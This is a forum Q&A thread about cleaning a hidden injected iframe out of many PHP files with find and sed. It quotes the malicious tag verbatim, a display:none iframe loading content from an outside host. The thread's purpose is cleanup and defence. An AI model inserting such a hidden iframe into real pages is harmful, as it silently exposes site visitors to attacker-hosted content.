Hello,

I am looking for a shell script to remove the following code from multiple files:

<iframe hbfww='BoGJMTtZ' src='http://getrelax4you.com/in.cgi?7 ' width='665' height='432' style='display:none'></iframe>

I found scripts to remove iframes, but they were all for code with double quotes.

Like this one here:

find -name "*.php" -exec sed -i 's/<iframe src="http:\/\/124.217.252.62\/~admin\/count.php?o=2" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no><\/iframe>//' {} \;

I tried escaping the single quotes like this:

find -name "*.php" -exec sed -i 's/<iframe src=\'http:\/\/getrelax4you\/in.cgi?7 \' width=\'665\' height=\'432\' style=\'display:none\'><\/iframe>//' {} \;

but then I get --> syntax error near unexpected token `<'

A: 

You might need to escape the < using a backslash: \< (or \\<, to escape the escape char from the shell)

John Weldon
I tried both, but it doesn't really work. Can you post a full command?
AciDRaT
A: 

Strange, but double quotes on the outside work for me:

find -name "*.php" -exec sed -i "s/<iframe src=\'http:\/\/getrelax4you\/in.cgi?7 \' width=\'665\' height=\'432\' style=\'display:none\'><\/iframe>//" {} \;

But I cannot stop wondering why your command doesn't work. I tried this on bash.

MvanGeest
Hm, it runs, but has no effect on my files.
AciDRaT
OK, how about removing some backslashes? Like the ones that escape the `'` single quotes? Shell quoting is complicated.
MvanGeest
+1  A: 
cat xyz.php | sed "s/.*BoG.*$//g" > fixedxyz.php

replace the BoG with as much as is necessary to make it unique (the '<' is irrelevant in my search/replace)

KevinDTimm
This seems to do the trick, thank you. My final code is: `find -name "*.php" -exec sed -i "s/.*getrelax.*$//g" {} \;`
AciDRaT
yes, I saw your line after my entry - figured you'd be OK with my form :) Don't forget to upvote/accept....
KevinDTimm
Though you have a competing answer, I'll do some upvoting for you.
MvanGeest
Thanks - I just like giving an example that matches in the short pattern - makes understanding the process much easier when you find this happening again in 3 months :)
KevinDTimm
And, it would have been better if I had chosen 'getrelax4you' as my constant in the regex (for clarity reasons)
KevinDTimm
May I ask why you didn't do `sed "s/.*BoG.*$//g" < xyz.php > fixedxyz.php`? To show how you could pipe input into `sed`? Or wouldn't this work at all?
MvanGeest
It's a style thing - I think it makes it clearer to a neophyte when they look at the format I used (it 'reads' left to right). Both are correct though.
KevinDTimm
A: 

This should work without any escaping:

sed "s|<iframe hbfww='BoGJMTtZ' src='http://getrelax4you.com/in.cgi?7 ' width='665' height='432' style='display:none'></iframe>||"
Dennis Williamson
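
Added example, not part of any answer in this thread: the `s/.*getrelax.*$//g` form blanks the entire line, so any legitimate code sharing a line with the injected tag is deleted too. The sketch below removes only the `<iframe>` element, whatever random attribute precedes `src`, and keeps a `.bak` copy of each changed file. It assumes GNU grep, xargs and sed; the function names and the sample files are constructed for illustration.

```shell
#!/bin/sh
# Added example (not from the thread). Assumes GNU grep, xargs and sed.
DOMAIN='getrelax4you\.com'   # host from the question, dot escaped for the regex

# Print the .php/.html files under $1 that still reference the domain.
list_infected() {
    grep -rl --include='*.php' --include='*.html' "$DOMAIN" "$1"
}

# Delete only the injected element; everything else on the line is kept.
# [^>]* absorbs the random attribute (hbfww='...') and the size/style
# attributes, and cannot run past the end of the tag.
clean_iframes() {
    grep -rlZ --include='*.php' --include='*.html' "$DOMAIN" "$1" |
        xargs -0 -r sed -i.bak \
            "s|<iframe [^>]*src='http://${DOMAIN}/[^>]*></iframe>||g"
}

# Constructed sample: the iframe shares a line with legitimate PHP.
make_sample() {
    d=$(mktemp -d)
    cat > "$d/index.php" <<'EOF'
<?php echo "hello"; ?><iframe hbfww='BoGJMTtZ' src='http://getrelax4you.com/in.cgi?7 ' width='665' height='432' style='display:none'></iframe>
<p>footer</p>
EOF
    printf '<p>clean</p>\n' > "$d/about.html"
    echo "$d"
}
```

Run `list_infected` before and after `clean_iframes` on the web root, and diff each file against its `.bak` copy before deleting the backups.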
A: 

I have the same issue. Is this a hacker or a virus?

is added to almost all my php files and some html files.

Someone please shed some light on this

mike